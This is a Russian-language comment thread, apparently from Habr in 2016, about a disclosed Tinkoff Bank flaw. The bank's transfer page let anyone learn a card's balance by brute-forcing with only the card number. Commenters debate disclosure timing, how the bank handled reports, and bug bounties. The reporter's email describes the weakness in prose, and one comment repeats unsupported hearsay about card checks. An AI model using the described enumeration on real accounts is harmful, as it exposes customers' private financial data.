А если банк намеренно или случайно разглашает информацию о клиентах, как это трактуется?KovVlad
12.08.2016 12:50Трактуется кем?
Если вам интересно мое мнение, то возможность узнать баланс по номеру любой введенной карты — неверное поведение систем ДБО банка. Поэтому она была закрыта, как только о ней стало известно. При этом стоит учитывать, что без дополнительной информации эта уязвимость достаточно сложно эксплутировать.
У вас, других хабражителей или ответственных органов точка зрения может быть другой.
ChALkeRx
12.08.2016 12:19+1Знаете, а вот с
Ошибка незначительная
я, пожалуй, не соглашусь. Это была весьма неприятная штука, позволяющая получить приватную информацию о состоянии счетов пользователей по номеру карты.
ChALkeRx
12.08.2016 12:21Кстати, по-хорошему вам бы ещё поднять лог запросов и этот ендпоинт с целью проверить, эксплуатировалось ли это кем-нибудь, и предупредить затронутых пользователей, если да.
И провести аудит, в том числе процессов, которые допустили такое.
Mugik
12.08.2016 12:57+3Вот была ошибка, исправили, извинились, написали типа наша вина, всё ок.
Но нет всегда надо уходить от ответственности. Ошибка незначительная, надо четче формулировать описание и дожидаться ответа… попытка переложить вину на пользователя.KovVlad
12.08.2016 13:02+1Поясню, чтоб было понятно: письмо от автора не содержало никакой информации о характере ошибке.
KovVlad
12.08.2016 13:31А вот и сам текст, раз уж автор разрешил.
Как видите, информации для реакции в нем, мягко говоря, немного. И самое неприятное, что оно отправлено на ящик, предназначенный для консультаций по кредитным продуктам. В нем и по делу-то немало сообщений, а уж похоже выглядящих «предложений сотрудничества» сыпется…
-----Original Message-----
From: ********[mailto:************@**********.ru]
Sent: Monday, August 08, 2016 10:52 AM
To: credit <credit@tinkoff.ru>
Subject: [[SOME_TECHNICAL_ID]]
Добрый день.
Я нашел ошибки в работе вашей системы, в следствии которых банк теряет деньги (возможные потери от 1-2 тысяч в месяц до примерно 10-20 на одном клиенте).
готов обсудить варианты сотрудничества по схеме
На конференции Black Hat представители компании Apple сделали важное объявление: с 1 сентября 2016 года Apple запускает собственную программу bug bounty. Компания обещает выплачивать исследователям награды в размере до $200 000, но пока только избранным.
В последнее время Apple оставалась одной из немногих компаний-гигантов, у кого до сих пор нет собственной программы вознаграждения за уязвимости. Такие инициативы достаточно давно есть у Micorosoft, Facebook, Twitter, Yahoo, Google и так далее.
Заранее спасибо!
— Завершение пересылаемого сообщения —Superl3n1n
12.08.2016 13:40+6Т.е. вы не стали связываться с автором топика лишь по тому, что он в своем письме деликатно намекнул на то, что не плохо было бы поощрить его?
KovVlad
12.08.2016 13:46+2Нет, потому что он один из десятков, пишущих каждый день от «я нашел у вас дырку» до «я спер у вас всю базу клиентов с номерами карт,
отпечатками пальцев и ДНК» :) на общий ящик.Superl3n1n
12.08.2016 13:51+4Т.е. вам ежедневно присылают десятки писем о возможных уязвимостях, которые вы просто игнорируете? И да. Письмо автора топика было без технических подробностей, т.к. нечего всякому кредитному консультанту знать о том как эксплуатировать данную уязвимость.
KovVlad
12.08.2016 13:53вы передергиваете
ни одно обращение не игнорируетсяSuperl3n1n
12.08.2016 13:57+2А тогда, через какой промежуток времени вы выходите на связь с автором письма?
И я не передергиваю, это вы написали про десятки обращений, пишущих каждый день.KovVlad
12.08.2016 14:03А тогда, через какой промежуток времени вы выходите на связь с автором письма?
Выходу на связь по таким обращениям предшествует, эммм, некая внутренняя работа СБ. Хотите верьте, хотите — нет, но, если бы статьи не было, с автором связались бы сегодня.
И я не передергиваю, это вы написали про десятки обращений, пишущих каждый день.
Да, я написал, что их немало. Но нигде не писал, о том, что они игнорируются.Superl3n1n
12.08.2016 14:11+2Я спросил, почему вы не связались с автором топика. Вы ответили: потому что, он один из многих. Нигде в вашем ответе не было упоминания о том, что с ним собирались связаться сегодня и его письмо все это время рассматривалось СБ или кем-то другим. На основании этого и складывается впечатление, что вы просто такие письма игнорируете.
ChALkeRx
12.08.2016 14:21Офигеть.
Извините, других слов нет.
ChALkeRx
12.08.2016 16:38+1UPD: как видно ниже, это было не то письмо, которое не имеет отношения к автору этой статьи.
Так что теперь я скорее удивлён тем, что сотрудники банка выложили не то. Но всё равно ситуация продолжает оставаться удивительной.
kromm
12.08.2016 15:39+18Хм, забавно, но это не мое письмо.
Мое было отправлено на адрес, указанный на странице контактов как адрес службы безопасности, и там были перечислены все детали и тем более никакого вымогательства:)
Если уж это так важно, то:
To: cso@tinkoff.ru
Date: Mon, 08 Aug 2016 21:10:32 +0300
From: b***f <b*****f@******.ru>
Добрый вечер,
зашел сейчас перебросить денег и обнаружил не очень приятную особенность на странице переводов https://www.tinkoff.ru/cardtocard/
Если карта отправителя — тинькоф, аякс, считающий комиссию, заодно и проверяет наличие денег на счету. Если их там нет, то выдает ошибку «недостаточно средств на счете». Проблема в том, что он работает уже по одному введенному номеру карты, не проверяя валидность остальных полей (срок/cvv). В итоге зная один только номер карты, можно за несколько секунд перебором определить ее баланс.
Прикройте, нехорошо получается :3
А с автором письма выше связались бы, мало ли у него чего поважнее.ChALkeRx
12.08.2016 16:40+2Ммм. А вот это вы нормально написали, относительно содержания письма все претензии снимаю, извините.
Теперь вопросы скорее к сотрудникам банка — почему они его до сих пор не нашли. Или нашли, но специально опубликовали другое?
UPD: и добавьте это, пожалуйста, в статью. С таймлайном. Чтобы снять недоразумения.
iqiaqqivik
12.08.2016 12:59+3> Мы всегда открыты к работе по программе Bug Bounty
И в чем же это выражается?
Ramires
12.08.2016 13:52На openbugbounty есть несколько закрытых и одна незакрытая бага, возможно, надо было через них связываться
На сайте банка никакой информации, к сожалению, нет
kirill_danshin
13.08.2016 22:15+1Лучше было бы дождаться ответа от службы безопасности и четче формулировать суть замечаний в письме. Это сократило бы время реакции.
Куда еще четче формулировать суть замечаний? Автор очень ясно все объяснил, а случай, когда Вы левое письмо выложили вообще наводит на мысли о том, что вы лучше следите за кредитными консультациями, чем за ящиком службы безопасности.
rockin
12.08.2016 13:02-5Я не могу считать эту уязвимость заслуживающей внимания для меня лично.
У меня сейчас на карте 18.000 рублей. Туда-сюда.
И что вам это даст? Позвоните мне и скажете «у вас 18 тыщ рублей, дайте мне номер карты, цвв и кодовое слово!!!»
Ну так я над звонящим просто посмеюсь и всё.
***
И про клиент-банк. Совсем недавно (с неделю или около того) убрали старый клиент-банк, который для меня лично был эталоном инет-банка вообще. Он был доступен по http://www.tcsbank.ru/bank, там сейчас даже формочка старая (тёплая, ламповая ;) ) ещё висит.
А новый клиент-банк — это убожество на волне дурацких лендингов, когда все откуда-то выплывает, всплывает, появляется. Информация размазана йух знает где и бох знает как. Я до самого последнего момента пользовался предыдущим инет-банком.
***
И про банкинг для бизнеса. Знаете, ребята, за 500 рублей (или 1000) в месяц вам НИКТО расчётный счёт не откроет. А эти господа из ткс открыли и очень быстро. Два месяца бесплатно при этом.
Плюс, менеджер мне классный попался, уж не знаю, все ли там менеджеры такие, но Анатолий Николаевич ваще молодец. Что-то я не припомню, чтобы в банках со мной так приятно разговаривали. И по делу.
А сбер… ну что, сбер… позвонили их манагеры мне после открытия юрлица 14(!) раз, один раз позвонил альфа-банк и также единожды — точка. Очень приятное общение, хотелось их звонка с пятого посылать просто.
Репутация сбера для меня лично запятнана навсегда.
Сколько нервных клеток я потратил, когда их расчудесный и безопаснейший «клиент-банк» необходимо было переносить.
Помните, наверное, про такой, до эпохи «сбербанк онлайн». Прога ставилась на комп и привязывался сертификат к железу. токен для установления безопасного соединения по дефолту блокировал локальную сеть :] поделие амикон адское. Да, это можно было всё снять. ПО ЗАЯВЛЕНИЮ БУМАЖНОМУ В ОТДЕЛЕНИИ БАНКА!!!
unst
12.08.2016 13:32+1Там выше уже дали ссылки на старые интернет-банки от ТКС.
Продублирую
Чуть поновее — https://www.tinkoff.ru/mybank/
Совсем старый — http://tinkoff.ru/bank
AndrewTishkin
12.08.2016 22:27Не считайте, разрешаем. Если придерживаетесь мнения, что «лоху — лохово», «на ошибках учатся», «богатые тоже плачут», то это не значит, что все должны так же считать, что денежные лохи, которые наверняка найдутся среди клиентов любого банка, должны страдать от целевой атаки на них мошенников.
PS: хотя, честно говоря, встречая на просторах сети череду глупых и наивных вопросов от хорошо зарабатывающих людей, порой хочется выругаться «да найми ты уже себе фин.консультанта, не парь мозги себе и другим», так что скорее всего мне понятно отсутствие жалости к таким жертвам обмана
ModoStudio
13.08.2016 00:08+1Я не могу считать эту уязвимость заслуживающей внимания для меня лично.
У меня сейчас на карте 18.000 рублей. Туда-сюда.
Вы лично можете не считать. У вас 18.000, у кого-то больше. Это для вас 18.000 — это туда-сюда, а есть люди, которые 18 туда-сюда в миллионах меряют. А есть, кто на 10.000 рублей, а то и на меньшие суммы живёт. От какой цифры будем считать уязвимость заслуживающей внимания?
Flammar
12.08.2016 14:47Несколько лет назад читал информацию, что якобы сами платежные системы поверяют только номер карты, и не проверяют ни CVV/CVC-код ни срок действия ни имя владельца. Всю эту информацию обязан проверять оператор, работающий с платёжной системой. В таком случае для списания денег с карты достаточно знать только её номер, и сам номер является критично важной информацией.
ModoStudio
12.08.2016 19:58+3Вот и СМИ подключились: https://lenta.ru/news/2016/08/12/vashbalans/
Да их тут целый Яндекс: https://news.yandex.ru/yandsearch?cl4url=www.securitylab.ru%2Fnews%2F483374.php&lr=213&rpt=story
@kromm теперь знаменит)) А Тиньков теперь будет более клиент-ориентированным и научится быстрее читать письма и закрывать дыры.
AndrewTishkin
12.08.2016 22:33Тинькофф Банк — вечный студент, всё время учится.
То Агарков, то вкладчики, то Хабр, теперь ждём, какие открытые уроки будут в новом учебном году
PS: особо доставляет заголовок life.ru — «Хакер заявил, что смог вскрыть данные счетов в „Тинькофф банке“.
Повезло человеку: приняли в ряды Хабра, посвятили в хакеры, — такие события обязательно надо отметить на выходныхModoStudio
12.08.2016 23:54+2:D На самом деле после таких заявлений life.ru, я бы на месте kromm, поднапрягся. Эта "желтизна" откровенно подводит автора под статью. Презумпция невиновности у нас в России как известно не работает. Это на Хабре автор — "очередной школьник" ( судя по этому комменту: https://habrahabr.ru/post/307628/?reply_to=9749638#comment_9747556), а там он с "лёгкой руки" life.ru превращается в хакеры. Вот вас например, часто друзья прекрасными вечерами просят закинуть им 50К на карточку?
Я вот смотрю, kromm уже приходится потихонечку ловить фейковые намёки на вымогательство. Он даже уже начинает оправдываться: https://habrahabr.ru/post/307628/?reply_to=9749638#comment_9749060
Так что, это конечно доставляет, но Тиньков — персонаж вспыльчивый, да к тому же богатый. Как бы kromm не пришлось оправдываться, за то что "нагнул" сей до жути чудесный банк.
Но вот что точно могу сказать, после такой широкой огласки, тем более в СМИ — не быть теперь kromm клиентом этого банка. А если ещё и кредиты в Тинькове "висят", то тут вообще труба, каллы уже небось готовятся выстроиться в очередь.
P. S. У Тинькова сейчас есть хорошая возможность пропиарить себя и банк. Извиниться перед клиентами, мол с кем не бывает, учтём, будем совершенствоваться и.т.д. И публично поблагодарить автора, за бдительность, и за то, что помогает улучшать качество услуг. Приличные компании за найденные дыры в безопасности, кстати деньги платят. А, да, совсем забыл, это же у них. У нас обычно наоборот.
Но это ИМХО, а все совпадения событий и имён случайны. :)
KovVlad
13.08.2016 00:05+2Разве плохо постоянно учиться на своем (и чужом, кстати, тоже) опыте? Как позитивном, так и негативном?
Просто банк постоянно ходит в челленджерах (хотя по размеру это уже не так), и при этом очень публичен в медийной сфере. Вот такие истории и находят интерес у публики.
Самый быстро растущий розничный банк? Самая крупная в финансовой сфере логистическая сеть? 4я подряд награда Delloite за лучшее мобильное приложение? Фи, как скучно. А вот Агарков или баг на сайте, это медиаповод.
Такая уж природа человека, нужны зрелища :)
Попробуйте заменить в заголовке этой статьи название нашего на название любого другого российского. Много у вас вариантов получится, чтобы вызвать такой интерес? Осмелюсь предположить, что не очень.
pansa
13.08.2016 00:43+2Ох уж эти СМИ.
Вот кто-нибудь видел, чтобы так раструбили об исследовании ДБО, которое недавно провели (точнее, повторили, оно ежегодное) PT Security? Ну, кроме специализированных ресурсов, конечно. А ведь там — 55% исследованных систем позволяли получить доступ к БД. Ну и еще куча интереснейших цифр. Вот это полный ахтунг. И ничего, СМИ молчком. Слишком много умных слов, вероятно.areht
13.08.2016 05:22> А ведь там — 55% исследованных систем позволяли получить доступ к БД.
Эм… Где?
Я вижу 55% — «Недостаточная авторизация при доступе к данным пользователей». Это сабж, собственно.pansa
13.08.2016 12:57Раз уж вы просите — п.1, абзац 2 в pdf-ке с их сайта. :)
Но там через всю статью эти цифры и выводы повторяются. Кстати, читается немного занудно, статья очень растянута на мой взгляд.areht
13.08.2016 14:12На мой взгляд, при 55% контроле над СУБД через каналы ДБО, денег в этих банках быть уже не должно.
NaaNLav
12.08.2016 19:58+1«хоть мобильное приложение пока нормальное.» Фиг. На iPad у них его просто нет. Вообще. Интернет-банк, блин.
melt
12.08.2016 23:25+1Вы уверены? Вообще-то есть, правда еще со времен iOS 6. Уже несколько лет обещают обновить, но видать пока приоритеты нацелены на интернет-банк. Зато старые устройства поддерживаются, это лучше, чем у Яндекса — приложения требуют 8+ айос, которые я, например, не планировал ставить
Скриншот
TimsTims
13.08.2016 22:54+6Автор, ты там пиши время от времени, жив ли ты еще…
kromm
15.08.2016 13:47Пока все спокойно, самому интересно чем это все может закончиться. Как минимум уже официально объявили о начале программы баг баунти, на мой взгляд это отличиный шаг для банка.
ChALkeRx
15.08.2016 13:54Знаете, а вот это очень круто. Возможно даже, я был неправ и оно того стоило.
Но, даже учитывая это, я бы всё равно не стал публиковать через три дня отсутствия ответа, но ваше поведение в итоге привело к положительному результату.
Добавите в новость, кстати?
vovansystems
16.08.2016 14:34+2не холивара ради, а просто интересно — сколько часов лично Вы считаете правильным потратить на попытки коммуникации с банком и сколько в общем случае нужно выждать перед публикацией уязвимости в открытых источниках (при отсутствии bug bounty)?
ChALkeRx
17.08.2016 09:06+1Смотрите.
При успешных попытках коммуникации, очевидно, публикацию нормально делать сразу по исправлению или по получению заверений, что это не баг и так и надо. Желательно — синхронизировать с публикацией самой компании, которая, конечно же, тоже должна её делать, для оповещения своих клиентов (только чую я, этого никогда не будет в случае банков). Это не зависит от наличия или отсутствия программы bug bounty.
При неуспешных — в данном случае, да, я считал бы правильным попытаться потратить на это несколько часов. Ну два-три, допустим. Или по-крайней мере написать второе письмо и позвонить в поддержку, узнав, рабочий этот ящик вообще или его никто не смотрит. С освещением этого факта в публикации, если на это действительно ушло слишком много времени. Но не пять минут, не ответили, чёрт с ними.
vovansystems
17.08.2016 09:11да, с такой формулировкой я согласен. спасибо за ответ!
ChALkeRx
17.08.2016 09:41На коммуникацию обычно времени тратится гораздо больше, чем на поиск самой уязвимости, как бы не хотелось обратного.
Это если под коммуникацией считать попытки связаться, общение с компанией, публикацию статьи. Хотя компания могла бы и не вставлять палки в колёса и минимизировать первые два, как минимум, а на последнее я почти всегда просто забиваю, к моему стыду — если это не что-то важное, что явно может затронуть других людей даже после исправления.
Например, на Travis у меня ушло в два раза больше времени только на попытки связаться, чем на собственно поиск дыры — около часа и около двух соответственно. Это ещё без второй затронутой компании, без последующей переписки с перепроверкой исправлений и без времени на написание текста.
C npm история ещё веселее — я до сих пор трачу время на разгребание этого.
Причём это ещё относительно нормальные ситуации — Travis после того, как я нашёл нужный контакт, были довольно приятны в общении и всё было достаточно хорошо.
Были и такие случаи, когда служба поддержки активно не хотела выдавать нужный контакт и проверять, что письмо дошло, удивлялась моей почте на gmail и вообще хотела, чтобы я как-то доказал, что не верблюд. Но они мелки и неинтересны, так что тыкать пальцем не буду. Хотя, возможно, как-нибудь скомпоную эту переписку в один большой текст (она в нескольких нитях), обезличу, и выложу с пометкой «как делать не надо».
Optik
17.08.2016 10:41Достаточно для начала понимать, что чем крупнее и публичней компания, тем больше у них писем в ящиках совершенно разного качества. Чтобы это все разгребать нужно держать приличный штат первичной поддержки, которая будет разруливать письма по отделам. А здесь уже влияет число писем в ящике — чем их больше, тем больше штат, тем сложнее найти людей с достаточной квалификацией на рутинную и не особо интересную работу, что выливается в неизбежные проблемы с приоритетами, отправкой нужным людям и т.д. Яркий пример мировые гиганты, где письма даже от корпоративных клиентов будут болтаться неделями в неизвестном состоянии.
ChALkeRx
17.08.2016 10:47что чем крупнее и публичней компания
Это лишь в первом приближении. Тот же GitHub абсолютно адекватен и всегда быстро отвечал (у него, впрочем, и программа Bug Bounty есть). На скорость реакции Travis и npm я тоже пожаловаться не могу, с трависом просто контактный емейл был запрятан, а дальше всё хорошо.
А вот самый трешак из последнего был с некрупной компанией, которая занимается то ли разработкой/поддержкой софта, то ли чем-то близким к этому.
Но банки это отдельная песня, да.
Optik
17.08.2016 10:58У гитхаба по сути один бизнес продукт и 605 человек у того же тинькоффа очевидно сильно больше одного и 10000 человек (цифры из гугла). Масштаб несколько разный. Попробуйте организовать коммуникации в первом и втором случае.
ChALkeRx
17.08.2016 11:02Ок. Возьмём другую компанию, в 10 раз приблизительно крупнее гитхаба (цифры, аналогично, из гугла), но тыкать пальцем в название не буду.
Они тоже среагировали достаточно быстро, хотя вот с пинанием их и пришлось повозиться — на первое письмо по адресу они действительно не ответили за пару дней, пришлось искать другие каналы. Но это завершилось успехом в итоге.
Optik
17.08.2016 13:35Ну и здесь насколько понял был вопрос пары дней (судя по отпискам в комментах бага была исправлена примерно в одно время с публикацией), только почему-то на письмо не ответили. Последнее плохо, а оперативность приемлемая, имхо, для официального канала.
ChALkeRx
17.08.2016 13:38Так те тоже на письмо не ответили сначала и не факт что прочитали, пришлось по другим каналам пинать.
Optik
17.08.2016 14:29Это я понял, разница только, что вы искали другие каналы, а здесь статью в паблик и со скриптом для пользования широкими массами. Хотя вполне возможно в обоих случаях ответили бы еще через пару дней. Я к тому, что при равных усилиях более тяжелой организации требуется больше времени на реагирование. Это нормально и я не знаю схемы управления, которая бы ей позволяла быть такой же быстрой как небольшая компания.
ChALkeRx
17.08.2016 11:04Кстати, в случае Тинькоффа тут ключевую роль играет не количество операторов в отделениях и точках, а именно количество человек, отвечающих за разработку и информационную безопасность, плюс, возможно, аудитория (внимание и общее количество репортов от неё зависит, в том числе).
fryday
20.08.2016 20:33Зарепортил на cso@tinkoff.ru 3 августа об уязвимости в Тинькофф Квесте, который проходил 6-го августа. Ответа не дождался, но уязвимость прикрыли. А через 8 дней публичное баг-баунти появляется, очень грустно выходит %)
P.S. Надеюсь скомпрометированные шаги квеста поменяли, иначе не хорошо получается =)
moxy
Возможно в тз сам банк поставил пункт, где проверялся бы баланс без перезагрузки страницы, не слушая никаких аргументов со стороны разработчиков против этого. Для банка это фишка и удобно для пользователя, а на деле…
staticlab
Так ведь можно же авторизовывать карту, не?